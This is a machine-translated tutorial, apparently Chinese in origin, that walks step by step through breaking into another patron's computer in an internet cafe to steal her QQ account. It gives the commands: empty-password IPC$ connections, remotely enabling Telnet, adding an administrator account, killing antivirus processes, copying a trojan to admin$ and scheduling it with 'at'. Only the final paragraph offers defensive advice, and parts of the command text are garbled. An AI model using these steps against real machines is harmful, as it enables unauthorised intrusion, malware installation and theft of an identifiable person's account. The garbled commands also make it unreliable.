Commands and techniques used in Security Detection for Internet cafes

There are a lot of Internet cafe management software, but most of them have one or more vulnerabilities. As a result, there are a lot of cracking skills for Internet cafe software and Internet cafe software, so they can access the Internet for free, you can use the "command prompt" method and the Administrator permission. As a result, Internet cafes have become the most serious part of virtual property loss. However, as long as the internet cafe administrator level is sufficient, this situation can still be avoided. It's a bit complicated to tell you how I used to get the MMQQ number in an Internet cafe. It mainly helps you understand the commands used during hacker intrusion.

Step 1: first determine the IP address of the computer used by MM. The computer number and IP address of the Internet cafe are usually the same or the first one, for example, the computer numbered 20 in the Internet cafe, generally, the IP address is 192.168.0.20 or 192.168.0.21 (192.168.0.1 is left to the router). In addition, the machine name is also regular, and the machine name of computer 20 is usually Wangba20, so long as you know the computer used by MM, go to the "command prompt" and Ping Wangba20 to get the IP address, for example, 192.168.0.20.

Step 2: With an IP address, you can connect to the MM computer. Because most computers in the internet cafe use Windows 2000 without Patches, in addition, the user name used to log on to the computer is mostly in the form of a "user ID" with an empty password. Therefore, enter net use // 192.168.0.20/ipc $ Content $ nbsp at the "command prompt; ""/user: "" and net use // 192.168.0.20/ipc $ Content $ nbsp; ""/user: "user20" command to establish a connection.

After the connection is successful, it is necessary to close the antivirus software in the other party's computer. Right-click "my computer" and choose "manage". In the displayed window, right-click "Computer Management (local )", select "connect to another computer", connect to 192.168.0.20, and start the "Telnet" Service ("Computer Management" can directly manage remote computers ).

Step 3: enter two commands at the "command prompt" to create a user20 user on the local machine and add it to the Administrator group.

Net user user20/add

Net localgroup administrators user20/add

Step 4: Go to C: \ Winnt \ System32, right-click CMD. EXE, select "create shortcut", right-click the newly created shortcut, select "properties", and select "Run as another user" (run the program as another user ). Run the shortcut CMD. After the "run as another user" window is displayed, enter "user20" and press Enter.

Step 5: use telnet 192.168.0.20 to log on to the MM computer, and then download a command line tool from the Internet to kill processes, such as knlps. In telnet, disable the antivirus software process.

Step 6: Now you can download a Trojan and copy it to the MM's computer using the "copy Trojan name .exe // 192.168.0.20/admin $" method. Run the net time // 192.168.0.20 command to get the MM computer time, for example, four o'clock P.M.. Then run "at // 192.168.0.20 time Trojan name .exe ", for example, run the "at // 192.168.0.20 Trojan .exe" command at a specified time.

With the trojan, You can naturally know the QQ number used by MM.

How about it? Is it dangerous in an Internet cafe? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are very secure, as long as you are using QQ or other software, select "Internet cafe mode" (click "Advanced Settings" and the "Logon mode" option appears ).